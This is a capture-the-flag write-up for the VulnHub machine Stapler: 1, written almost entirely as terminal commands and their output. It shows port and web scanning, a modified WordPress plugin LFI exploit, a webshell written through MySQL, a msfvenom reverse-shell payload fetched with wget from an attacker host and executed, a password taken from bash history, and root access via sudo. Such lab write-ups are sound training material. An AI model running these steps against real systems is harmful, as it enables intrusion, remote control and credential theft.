-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 # $Id: 2017_stapler-1.txt,v 1.0 2017/03/15 13:35:57 dhn Exp $ Writeup Stapler: 1 [1] 0x0) found the ports [dhn]::[~/dev/ctf/write_up/boot2root] export ip=174.0.42.6 [dhn]::[~/dev/ctf/write_up/boot2root] nmap -A -T4 -p- $ip Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-15 07:34 EDT Nmap scan report for S0106185933402fbc.cg.shawcable.net (174.0.42.6) Host is up (0.00023s latency). Not shown: 65523 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: Can't parse PASV response: "Permission denied." 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) |_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) 53/tcp open domain dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 80/tcp open http | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found | Connection: close | Content-Type: text/html; charset=UTF-8 | Content-Length: 568 | 404 Not Found |

Not Found

The requested resource /nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.

| GetRequest, HTTPOptions: | HTTP/1.0 404 Not Found | Connection: close | Content-Type: text/html; charset=UTF-8 | Content-Length: 533 | 404 Not Found |_

Not Found

The requested resource / was not found on this server.

|_http-title: 404 Not Found 123/tcp closed ntp 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open doom? | fingerprint-strings: | NULL: | message2.jpgUT | QWux | "DL[E | #;3[ | \xf6 | u([r | qYQq | Y_?n2 | 3&M~{ | 9-a)T | L}AJ |_ .npy.9 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 |_mysql-info: ERROR: Script execution failed (use -d to debug) 12380/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Tim, we need to-do better next year for Initech ... MAC Address: 00:0C:29:52:EF:A3 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.6 Network Distance: 1 hop Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -1s, deviation: 0s, median: -1s |_nbstat: NetBIOS name: RED, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: red | NetBIOS computer name: RED\x00 | Domain name: \x00 | FQDN: red |_ System time: 2017-03-15T11:36:17+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 0.23 ms S0106185933402fbc.cg.shawcable.net (174.0.42.6) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 236.29 seconds 0x1) run nikto [dhn]::[~/dev/ctf/write_up/boot2root] nikto -h https://$ip:12380 - - Nikto v2.1.6 - --------------------------------------------------------------------------- + Target IP: 174.0.42.6 + Target Hostname: 174.0.42.6 + Target Port: 12380 - --------------------------------------------------------------------------- + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost Ciphers: ECDHE-RSA-AES256-GCM-SHA384 Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost + Start Time: 2017-02-07 15:06:15 (GMT1) - --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Hostname '174.0.42.6' does not match certificate's names: Red.Initech + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + Uncommon header 'x-ob_mode' found, with contents: 1 + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + 7690 requests: 0 error(s) and 14 item(s) reported on remote host + End Time: 2017-02-07 15:08:41 (GMT1) (146 seconds) - --------------------------------------------------------------------------- + 1 host(s) tested 0x2) open firefox and go to https://$ip:12380/blogblog/ 0x3) discover that https://$ip:12380/blogblog/wp-content/plugins/ allows indexing... [dhn]::[~/dev/ctf/write_up/boot2root] curl https://$ip:12380/blogblog/wp-content/plugins/ -k -s | html2text ****** Index of /blogblog/wp-content/plugins ****** [[ICO]] Name Last_modified Size Description =========================================================================== [[PARENTDIR]] Parent_Directory   -   [[DIR]] advanced-video-embed-embed- 2015-10-14 13:52 -   videos-or-playlists/ [[ ]] hello.php 2016-06-03 23:40 2.2K   [[DIR]] shortcode-ui/ 2015-11-12 17:07 -   [[DIR]] two-factor/ 2016-04-12 22:56 -   =========================================================================== Apache/2.4.18 (Ubuntu) Server at 174.0.42.6 Port 12380 0x4) search for exploits [dhn]::[~/dev/ctf/write_up/boot2root] searchsploit advanced video - --------------------------------------------- ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/platforms) - --------------------------------------------- ---------------------------------- WordPress Plugin Advanced Video 1.0 - Local | /php/webapps/39646.py - --------------------------------------------- ---------------------------------- 0x5) modify and trigger the exploit [dhn]::[~/dev/ctf/write_up/boot2root] diff -ruN 39646.py.orig 39646.py - --- 39646.py.orig 2017-03-15 13:03:49.049281697 +0100 +++ 39646.py 2017-03-15 13:08:40.969292798 +0100 @@ -33,8 +33,11 @@ import random import urllib2 import re +import ssl - -url = "http://127.0.0.1/wordpress" # insert url to wordpress +ssl._create_default_https_context = ssl._create_unverified_context + +url = "https://174.0.42.6:12380/blogblog" # insert url to wordpress randomID = long(random.random() * 100000000000000000L) @@ -51,4 +54,4 @@ for line in content: if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line: urls=re.findall('"(https?://.*?)"', line) - - print urllib2.urlopen(urls[0]).read() \ No newline at end of file + print urllib2.urlopen(urls[0]).read() [dhn]::[~/dev/ctf/write_up/boot2root] python 39646.py ... 0x6) use the lfi [dhn]::[~/dev/ctf/write_up/boot2root] curl https://$ip:12380/blogblog/wp-content/uploads/1031875.jpeg -k -s | head -n30 0x8) create an webshell via 'into outfile' mechanism mysql> select "" into outfile '/var/www/https/blogblog/wp-content/uploads/sh.php'; Query OK, 1 row affected (0.03 sec) mysql> exit Bye 0x9) test the webshell [dhn]::[~/dev/ctf/write_up/boot2root] curl -k -s https://$ip:12380/blogblog/wp-content/uploads/sh.php?c=uname+-a Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux 0xa) create meterpreter and start multi handler [dhn]::[~/dev/ctf/write_up/boot2root] msfvenom -p linux/x86/meterpreter/reverse_tcp -a x86 --platform linux -b '\\x00' LHOST="10.9.0.2" LPORT=7766 -f elf -o dhn Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 98 (iteration=0) x86/shikata_ga_nai chosen with final size 98 Payload size: 98 bytes Final size of elf file: 182 bytes Saved as: dhn 0xb) use the webshell to download and execute the meterpreter [dhn]::[~/dev/ctf/write_up/boot2root] curl -k -s https://$ip:12380/blogblog/wp-content/uploads/sh.php?c=wget+http://10.9.0.2:8000/dhn+-O+/tmp/evil [dhn]::[~/dev/ctf/write_up/boot2root] curl -k -s https://$ip:12380/blogblog/wp-content/uploads/sh.php?c=chmod+777+/tmp/evil [dhn]::[~/dev/ctf/write_up/boot2root] curl -k -s https://$ip:12380/blogblog/wp-content/uploads/sh.php?c=bash+-c+/tmp/evil 0xc) gathering information msf exploit(handler) > run [*] Started reverse TCP handler on 10.9.0.2:7766 [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495599 bytes) to 174.0.42.6 [*] Meterpreter session 3 opened (10.9.0.2:7766 -> 174.0.42.6:46278) at 2017-02-08 11:45:23 +0100 meterpreter > sysinfo Computer : red.initech OS : Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 (i686) Architecture : i686 Meterpreter : x86/linux meterpreter > cd /home//JKanode meterpreter > ls Listing: /home/JKanode ====================== Mode Size Type Last modified Name - ---- ---- ---- ------------- ---- 100644/rw-r--r-- 167 fil 2016-06-05 19:25:05 +0200 .bash_history 100644/rw-r--r-- 220 fil 2015-09-01 01:26:22 +0200 .bash_logout 100644/rw-r--r-- 3771 fil 2015-09-01 01:26:22 +0200 .bashrc 100644/rw-r--r-- 675 fil 2015-09-01 01:26:22 +0200 .profile meterpreter > cat .bash_history id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ps -ef top kill -9 3747 exit 0xd) use the leaked password [dhn]::[~/dev/ctf/write_up/boot2root] ssh -o PreferredAuthentications=keyboard-interactive,password -o PubkeyAuthentication=no peter@$ip - ----------------------------------------------------------------- ~ Barry, don't forget to put a message here ~ - ----------------------------------------------------------------- peter@174.0.42.6's password: Welcome back! This is the Z Shell configuration function for new users, zsh-newuser-install. You are seeing this message because you have no zsh startup files (the files .zshenv, .zprofile, .zshrc, .zlogin in the directory ~). This function can help you with a few settings that should make your use of the shell easier. You can: (q) Quit and do nothing. The function will be run again next time. (0) Exit, creating the file ~/.zshrc containing just a comment. That will prevent this function being run again. (1) Continue to the main menu. (2) Populate your ~/.zshrc with the configuration recommended by the system administrator and exit (you will need to edit the file by hand, if so desired). - --- Type one of the keys in parentheses --- Aborting. The function will be run again next time. To prevent this, execute: touch ~/.zshrc red% id uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare) 0xe) captcha the flag via sudo red% sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for peter: ➜ peter id uid=0(root) gid=0(root) groups=0(root) ➜ peter cd /root/ ➜ ~ ls fix-wordpress.sh flag.txt issue python.sh wordpress.sql ➜ ~ cat flag.txt ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ .-'''''-. |'-----'| |-.....-| | | | | _,._ | | __.o` o`"-. | | .-O o `"-.o O )_,._ | | ( o O o )--.-"`O o"-.`'-----'` '--------' ( o O o) `----------` b6b545dc11b7a270f4bad23432190c75162c4a2b red% [1] https://www.vulnhub.com/entry/stapler-1,150/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJYyTWaAAoJEKjdmUcmQRI8zZcQAMG5XpysNtjlbEewGqT/30wK fFaem/vQ3RKHa2tXvL0diAF5MCaWVNpydw7/tYV00FhHI+HcZaiu/CGZSeSv9D/Y wMClG5TDou0Yuu9usE8UjNmVetp3va4RkGfbWM20U2J+PuwulA94yIbcYE9kwaar lCYtc0ABeEOJJNuBeOiEUcmOPmZCh/TwkO4gtun2OeZ2uO3CR9fvH6sr7YjvqRAt EKrSO12AcTmfO0DFJqW18di3ULuZnV8dF7p6p8CbSt0mA+7vc5pw8HIW4xLyh8uY H471GmcWduCxz927MP+F9mZn0rV32rUfTvFfEPpjIS6Ci/MWCQupaItToCVmUmsh PyxEHduAfDRS7CTNU2DwwhhswYRRXvynN2ScD0+8jbTgTKmilshfcNc/xbUho6ph i2IhiBMioHs2uogSykjuRCcGtF1hc8Y7sXGOLcUb/ipr2I+/BGcU7ChjCF0Ou6Kt IEgNVHyi6eBv+ygINQe+HloVnKGROOAR0x4HSElWqdI4hUBtK9OBL/jhxDgFgyiK BfVEPR3ghTQt98vEnas8fjxYcv4SST6xMJWFHxOG++PvAo5wlxhQDJxrOVKdc/GO UC99+mzysvtw3wDV3VsrAzz8M/hj37jJJ1wxnB4JXdU9dgx+IpeNkieYycAS+rjT njubQJ4biFy6Sc0ZWNCQ =uSdn -----END PGP SIGNATURE-----